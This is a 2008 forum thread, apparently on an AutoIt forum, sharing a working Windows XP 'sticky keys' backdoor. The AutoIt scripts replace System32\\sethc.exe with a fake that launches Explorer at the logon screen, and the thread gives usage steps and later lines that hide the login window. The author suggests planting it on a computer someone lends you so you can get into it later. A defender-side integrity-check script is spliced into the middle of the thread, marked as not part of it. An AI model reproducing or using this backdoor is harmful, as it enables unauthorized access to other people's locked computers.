JellyFish666 Posted August 4, 2008 (edited)

I am not sure if I am allowed to share it; if not, I shouldn't post my other scripts.

What does this do?
- Well, this is an exploit that takes advantage of the Windows "sticky key function" (note: sticky keys needs to be turned on).

How does this work?
- When you're logged off on your computer the "sticky keys function" is still active, so by replacing this file with a fake "sticky key function" you can do whatever you want. WOW!

Give me an example:
- Run the Injector.au3
- Click Enable
- Logoff (where you enter your password)
- Hit Shift x5 (may be more); if it doesn't work you need to enable "sticky keys"
Then the Attack.au3 will launch explorer.exe, and if you hit CTRL-ALT-DELETE it should show you another type of window asking for a password (old school login), but just let it sit there and don't touch it and you should be able to access your desktop... DO NOT FORGET TO DISABLE. My attack.au3 only opens up explorer, but if you add your own script and "sticky key" the attack will launch... ONLY TESTED ON WINXP

Injector.au3

    ; Back up the genuine sethc.exe once so that Disable can restore it later
    If Not FileExists(@ScriptDir & "\Real.exe") Then
        FileCopy(@HomeDrive & "\Windows\System32\sethc.exe", @ScriptDir & "\Real.exe")
    EndIf

    #include <GUIConstantsEx.au3>
    #include <WindowsConstants.au3>

    $Restore = GUICreate("Restore", 200, 25)
    $Enable = GUICtrlCreateButton("Enable", 0, 0, 100, 25, 0)
    $Disable = GUICtrlCreateButton("Disable", 100, 0, 100, 25, 0)
    GUISetState(@SW_SHOW)

    While 1
        $Msg = GUIGetMsg()
        Switch $Msg
            Case $GUI_EVENT_CLOSE
                Exit
            Case $Enable
                ; Swap in Fake.exe from the script folder (the post does not say how Fake.exe is built;
                ; presumably the compiled Attack.au3)
                GUICtrlSetState($Enable, $GUI_DISABLE)
                FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
                FileCopy(@ScriptDir & "\Fake.exe", @HomeDrive & "\Windows\System32\sethc.exe", 1)
                Exit
            Case $Disable
                ; Put the backed-up genuine sethc.exe back
                GUICtrlSetState($Disable, $GUI_DISABLE)
                FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
                FileCopy(@ScriptDir & "\Real.exe", @HomeDrive & "\Windows\System32\sethc.exe", 1)
                Exit
        EndSwitch
    WEnd

Attack.au3

    Run("Explorer.exe")

I changed the pictures a bit but they will give you an idea: TaskBar on log on screen, and if you push CTRL-ALT-DELETE you will get your desktop. I hid my icons of course for safety reasons.

Edited August 4, 2008 by JellyFish666
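A defender-side integrity check for the swap described above, added here as an example and not part of the thread: it compares the live sethc.exe against the copy Windows File Protection keeps in System32\dllcache (the mechanism behind the "File Protection complains" remark later in the thread) and flags a mismatch or a missing file. The directory layout and the sample bytes are constructed stand-ins so the script runs offline; on a real XP box you would pass the actual System32 and dllcache paths.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_sethc(system_dir, dllcache_dir):
    """Compare the live sethc.exe with the File Protection cache copy.

    Returns a dict with both digests and a 'tampered' flag. A missing live
    file is also flagged, because the injector deletes it before copying
    the fake in, and a restore that failed half-way leaves that gap.
    """
    live = os.path.join(system_dir, "sethc.exe")
    cached = os.path.join(dllcache_dir, "sethc.exe")
    if not os.path.exists(cached):
        raise FileNotFoundError("no reference copy to compare against: " + cached)
    ref_hash = sha256_of(cached)
    if not os.path.exists(live):
        return {"live": None, "reference": ref_hash, "tampered": True}
    live_hash = sha256_of(live)
    return {"live": live_hash, "reference": ref_hash, "tampered": live_hash != ref_hash}


def demo():
    """Constructed scenario: genuine cache copy, swapped live file, then restored."""
    root = tempfile.mkdtemp()
    system32 = os.path.join(root, "System32")
    dllcache = os.path.join(system32, "dllcache")
    os.makedirs(dllcache)
    genuine = b"MZ-genuine-sethc-sample"  # constructed stand-in, not a real binary
    with open(os.path.join(dllcache, "sethc.exe"), "wb") as f:
        f.write(genuine)
    with open(os.path.join(system32, "sethc.exe"), "wb") as f:
        f.write(b"MZ-replacement-sample")  # constructed stand-in for Fake.exe
    swapped = check_sethc(system32, dllcache)["tampered"]
    with open(os.path.join(system32, "sethc.exe"), "wb") as f:
        f.write(genuine)  # restore, as the Disable button does
    restored = check_sethc(system32, dllcache)["tampered"]
    return swapped, restored


if __name__ == "__main__":
    print(demo())
```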
Zinthose Posted August 4, 2008

I just gave this a try and I have to admit, scary and cool. The File Protection complains about replacing the file. Pressing Shift 5 times does indeed initialize Explorer while the system is "Locked". It does not however place focus to explorer as the locked screen is still dominant. I'm sure this can be somehow worked around. I see this example as demonstrating a possible security risk to Windows: to possibly allow a passerby to "Shift" their way into a locked system, as an example. I don't consider this a pressing matter as the system must already be compromised to install this hack, thus making this exploit more of a novelty than a genuine threat. I'm running this on an XP SP2 x86 system with up to date system patches.
BillLuvsU Posted August 4, 2008 (edited)

How about you rename it as a "Proof-of-Concept", because we know you would never actually use this. Other than that, good job on the exploit.

Edit: As far as the actual exploit goes, I don't see any risk at all. Basically the point of hacking is to get your code running on their machine, but if you can get an executable all the way to their system folders then you can just put it in their startup folder, or something else. On another note however, I could see this being useful as a fun way to start up a launcher program you make or something similar.

Edited August 4, 2008 by BillLuvsU
WeMartiansAreFriendly Posted August 4, 2008

Could you close the winlogin window?
Zinthose Posted August 4, 2008

mrRevoked said: Could you close the winlogin window?

Just tried it... caused the system to BSOD and reboot.
GHOSTSKIKDA Posted August 4, 2008

Hi

    FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")

Better to write:

    FileDelete(@SystemDir & "\sethc.exe")

Bye ...
JellyFish666 Posted August 4, 2008 Author (edited)

To bypass the screen, once you see your Taskbar push "Ctrl-Alt-Delete" and success.

I just called it a hack and people misuse that word; I was meaning a different kind of hacker. And yes, this could be good and bad, but I only see good coming from it. I mean sure, you could write a virus, but AutoIt doesn't really have a way of running unless your virus activates on "Sticky Keys" lol.

Replacing the @HomeDrive macro is smart; didn't think of it at the time. Started this short project early in the morning with no sleep.

"The File Protection complains about replacing the file" - what OS, what anti virus, what file protection (Windows?)

A good use, and maybe shouldn't be tried, but would be nice... if someone is letting you use their computer, enable this script and you can access their computer. You are sort of limited because of the log on screen (I know how to disable it but I'm not releasing that; I wasn't even going to release this...)

"Could you close the winlogin window? Just tried it... caused the systems to BSOD and reboot." - lol yes, it takes more than killing processes, at least the way I do it...

{==Edited==} Last time I'll edit this post lol. I just got back from work, but later I might show a good example of using this; I got lots of ideas.

Edited August 4, 2008 by JellyFish666
crashdemons Posted August 4, 2008

Can you HIDE the login window?
JellyFish666 Posted August 5, 2008 Author

crashdemons said: Can you HIDE the login window?

Better yet, you can disable it.
BinaryBrother Posted August 5, 2008 (edited)

    WinSetState("Log on to Windows", "", @SW_HIDE)
    WinSetState("Log on to Windows", "", @SW_DISABLE) ; Don't use DISABLE... It leaves the window apparent, and simply disables input to that window...

Either of these should work seamlessly... I'm for helping people... even if it really isn't 'helping'..

Edited August 6, 2008 by BinaryBrother